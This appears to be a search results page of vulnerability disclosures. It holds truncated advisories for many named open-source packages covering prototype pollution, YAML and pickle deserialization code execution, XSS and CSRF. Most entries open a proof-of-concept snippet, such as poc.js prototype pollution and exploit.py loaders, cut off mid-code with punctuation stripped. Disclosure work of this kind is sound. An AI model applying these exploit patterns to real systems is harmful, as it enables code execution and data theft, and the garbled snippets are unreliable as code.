4072 matches found
Prototype Pollution in react-atomic/react-atomic-organism
Description set-object-value is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var setObjectValue = require"set-object-value" var obj = console.log"Before : " + .polluted; setObjectValueobj, 'proto','polluted', 'Yes! Its Polluted'; console.log"Afte...
Prototype Pollution in x-extends/xe-utils
Description xe-utils is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const set = require'xe-utils' console.log'Before: ', .polluted set, 'proto.polluted', true console.log'After: ', .polluted 2. Execute the following commands in the...
Code Injection in facebookresearch/parlai
Description ParlAI pronounced “par-lay” is a python framework for sharing, training and testing dialogue models, from open-domain chitchat to VQA Visual Question Answering. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.p...
Code Injection in archivy/archivy
Description Archivy is a self-hosted knowledge repository that allows you to safely preserve useful content that contributes to your knowledge bank. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept Run exploit.py python import os...
Code Injection in baidu/cup
Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...
Code Injection in spotify/postgresql-metrics
Description Tool that extracts and provides metrics on your PostgreSQL database Vulnerability discription unsafe loading of data by the yaml.load function leading to Arbitrary code execution. Proof of Concept Vulnerable code part python readconfigdict = yaml.loadf...
Cross-site Scripting (XSS) - Generic in kekingcn/kkfileview
Description kkFileView this package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/kekingcn/kkFileView Steps To Reproduce-: stored XSS 1 install https://github.com/kekingcn/kkFileView locally or https://file.keking.cn/index use demo 2 while uploading files for preview use js...
in catalyst-team/catalyst
Description Catalyst is a PyTorch framework for Deep Learning research and development. It focuses on reproducibility, rapid experimentation, and codebase reuse so you can create something new rather than write another regular train loop. This package was vulnerable to Arbitrary code execution vi...
Prototype Pollution in robinvdvleuten/shvl
Description shvl is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of ServiceDoS/Remote Code Execution. Proof of...
Prototype Pollution in ionicabizau/obj-def
Description obj-def is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var objDef = require"obj-def" var obj = console.log"Before : " + .polluted; objDefobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Code Injection in uber/petastorm
Description Petastorm is an open source data access library developed at Uber ATG. This library enables single machine or distributed training and evaluation of deep learning models directly from datasets in Apache Parquet format. Petastorm supports popular Python-based machine learning ML...
Prototype Pollution in darrenpaulwright/object-agent
Description object-agent is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js import set from 'object-agent'; var obj = console.log"Before : " + .polluted; setobj, 'proto.polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute th...
Prototype Pollution in rodrigocmoreira/sgt-fields
Description sgt-fields is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var sgtFields = require"sgt-fields" var obj = console.log"Before : " + .polluted; sgtFields.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2...
Prototype Pollution in yowainwright/common-utilities
Description @common-utilities/merge-objects is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var a = require"@common-utilities/merge-objects" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " +...
Code Injection in tensorflow/models
Description Arbitrary Code Excecution in Tensorflow/Models.The TensorFlow Model Garden is a repository with a number of different implementations of state-of-the-art SOTA models and modeling solutions for TensorFlow users. We aim to demonstrate the best practices for modeling so that TensorFlow...
Prototype Pollution in bonnevoyager/nested-objects-util
Description nested-objects-util is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var unflatten = require"nested-objects-util" console.log"Before : " + .polluted; unflatten"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2...
Code Injection in svaarala/duktape
Description Arbitrary Code Excecution in svaarala/duktape/tools/genconfig.py. Duktape - embeddable Javascript engine with a focus on portability and compact footprint. Genconfig is a Process Duktape option metadata and produce various useful outputs. Technical Description This package was...
Code Injection in mozilla/deepspeech
Description Arbitrary Code Excecution in mozilla/DeepSpeech.DeepSpeech is an open source embedded offline, on-device speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers. Technical Description This package was vulnerable to Arbitrary...
Cross-site Scripting (XSS) - Generic in netlify/netlify-cms
Description netlify-cms-widget-markdown is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Use the application or use the demo https://cms-demo.netlify.com//collections/posts/new 2. Switch to markdown mode in edtior. 3. Insert the xss payload in to the editorbody 4. XSS payload will...
Prototype Pollution in patrickleet/expand-keys
Description expand-keys is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var expandKeys = require"expand-keys" console.log"Before : " + .polluted; expandKeys"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2. Execute the...
Code Injection in apolloauto/apollo
Description Arbitrary Code Excecution in genprotofile.py in ApolloAuto/Apollo. An open autonomous driving platform. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. fix is to be done genprotofile.py Exploit cod...
Code Injection in zqpei/deep_sort_pytorch
Description Arbitrary Code Excecution in deepsort built on pytorch. MOT tracking using deepsort and yolov3 with pytorch. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. All the scripts importing utils/parser.p...
Code Injection in microsoft/qlib
Description Arbitrary Code Excecution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment. Technical Description This package was vulnerable to...
Code Injection in ultralytics/yolov3
Description Arbitrary Code Excecution in ultralytics/yolov3. Yolov3 is a model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services,...
Code Injection in ultralytics/yolov5
Description Arbitrary Code Excecution in ultralytics/yolov5. Yolov5 is a Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of visi...
Code Injection in microsoft/nni
Description Arbitrary Code Excecution in microsoft/nni. An open source AutoML toolkit for automate machine learning lifecycle, including feature engineering, neural architecture search, model compression and hyper-parameter tuning. Technical Description This package was vulnerable to Arbitrary co...
in nvidia/runx
Description runx is a Deep Learning Experiment Management library by NVIDIA. This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load in yaml. repo: https://github.com/NVIDIA/runx Proof of Concept python...
Prototype Pollution in badopcode/nodash
Description ts-nodash is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var merge = require"ts-nodash".Merge const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; mergeobj, payload;...
Cross-site Scripting (XSS) - Generic in apexcharts/apexcharts.js
Description apexcharts is vulnerable to Cross-Site Scripting XSS. Proof of Concept 1. Install the package by following this instruction https://apexcharts.com/docs/installation/ or try the live sandbox here https://codepen.io/apexcharts/pen/xYqyYm 2. Edit JS and insert the XSS payload below in th...
Cross-site Scripting (XSS) - Generic in igniterealtime/openfire-bookmarks-plugin
Description openfire-bookmarks-plugin is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Download openfire and install https://www.igniterealtime.org/downloads/ 2. Run the server http://localhost:9090/index.jsp 3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install...
Prototype Pollution in ionicabizau/obj-unflatten
Description obj-unflatten convert flatten objects in nested ones. This package is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const unflatten = require'obj-unflatten' console.log'Before: ' + .polluted unflatten'proto.polluted':...
Prototype Pollution in ionicabizau/set-or-get.js
Description set-or-get is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var SetOrGet = require"set-or-get"; var obj = console.log"Before : " + .polluted; SetOrGetobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Cross-Site Request Forgery (CSRF) in strider-cd/strider
Description Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery CSRF. It allowes an attacker to takeover accounts, privillege...
Prototype Pollution in asaianudeep/deep-override
Description deep-override is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deepOverride = require"deep-override" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; deepOverrideobj,...
Prototype Pollution in steveukx/properties
Description properties-reader is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js var propertiesReader = require'properties-reader'; console.log"Before : " + .polluted console.log"Before : " + .polluted1 var properties =...
Prototype Pollution in evangelion1204/multi-ini
Description multi-ini is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js const ini = require'multi-ini'; console.log"Before : " + .polluted; var content = ini.read'./payload.ini'; console.log"After : " + .polluted; //payload.ini constructor...
Prototype Pollution in mout/mout
Description mout is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var mout = require"mout" var obj = console.log"Before : " + .polluted; mout.object.setobj,'proto.polluted','Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Cross-site Scripting (XSS) - Generic in thirtybees/thirtybees
Description Thirty bees is matured e-commerce solution which once started as a fork of PrestaShop 1.6.1.11 and is still compatible with almost all PS 1.6 modules. Its focus is on stability, correctness and reliability of the rich feature set, to allow merchants to focus on growing their business...
Business Logic Errors in braitsch/node-login
Description node-login is a template for quickly building login systems on top of Node.js & MongoDB. The business logic which updates account details fails to verify if the provied email is associated with another account. Proof of Concept 1. Navigate to /signup and Create two accounts with data...
Prototype Pollution in nodef/extra-object
Description extra-object is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var extraObject = require"extra-object" var obj =...
Cross-site Scripting (XSS) - Generic in s-cart/core
Description s-cart is a free e-commerce website project for businesses, built on the Laravel framework. this package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/s-cart/s-cart https://s-cart.org/about.html Steps To Reproduce-: 1 install https://github.com/s-cart/s-cart...
Code Injection in jadonk/bonescript
Overview BoneScript is a node.js library for physical computing on embedded Linux, starting with support for BeagleBone. Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in the setDate function. Proof of...
Prototype Pollution in mozilla/node-convict
Description convict is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var convict = require"convict"; var obj = ; var config =...
Prototype Pollution in b-heilman/bmoor
Description bmoor is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const bmoor = require'bmoor'; var obj = console.log"Before : " ...
Prototype Pollution in maikelvl/dot-json
Description dot-json is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Open NPM repo https://www.npmjs.com/package/frappe-charts 2. Open the Explore demos https://frappe.io/charts 3. At the bottom find the sandbox Ref:...
Prototype Pollution in imrefazekas/assign.js
Description assign.js is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var Assigner = require"assign.js" var assigner = new Assign...
Prototype Pollution in okunishinishi/node-objnest
Description objnest is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var objnest = require"objnest" console.log"Before : " +...
Prototype Pollution in generates/generates
Description @generates/merger is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var merger = require"@generates/merger" const paylo...
Prototype Pollution in jquense/yup
Description yup is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let yup = require'yup'; const payload =...